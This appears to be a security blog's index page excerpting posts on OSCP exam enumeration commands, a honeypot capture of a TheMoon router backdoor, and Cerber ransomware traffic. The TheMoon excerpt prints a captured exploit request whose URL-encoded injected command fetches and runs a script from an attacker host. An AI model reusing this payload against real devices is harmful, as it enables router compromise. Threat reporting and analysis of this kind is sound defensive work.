Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- ENUMERATING SERVICES – PART 2

ENUMERATING SERVICES   Enumeration Services is a vital next step, this will help us identify users, host information, protocol weaknesses and vulnerabilities we can use to our advantage. nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1 Web Enumeration: dirb http://10.0.0.1 /usr/share/wordlists/dirb/common.txt nikto –host http://10.0.0.1 SMB\RPC Enumeration: Netbios/SMB smb4k (graphical interface – lists shares)… Read More »

Share Button

How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide – Recon & Scanning PART 1

Passing the Offensive Security Certified Professional Exam is not like passing any other exam, this isn’t a multiple choice “what runs on port 22?” Security+ style brain dump exam. This is a 24 hour hands on, prove you have what it takes exam. If you think your up to the challenge we have created a… Read More »

Share Button

New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware The vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled website. POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host: 81.171.12.232\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′ https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/ Antivirus… Read More »

Share Button

CERBER Ransomware Hidden C2 Servers Traffic and Malware Analysis

Cerber ransomware has been one of the most prolific crimeware botnets to have arisen, it is currently generating an estimated $2.5 million dollars a year and rising. Once infected, your content is encrypted and held for ransom as the name implies. You will see an image popup with instructions on how to reclaim your data… Read More »

Share Button

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

  Example of files that were encrypted and protected:   The domain name ftoxmpdipwobp4qy.joa688.top was NX and not required for the purchase process. 2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1 E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0… Read More »

Share Button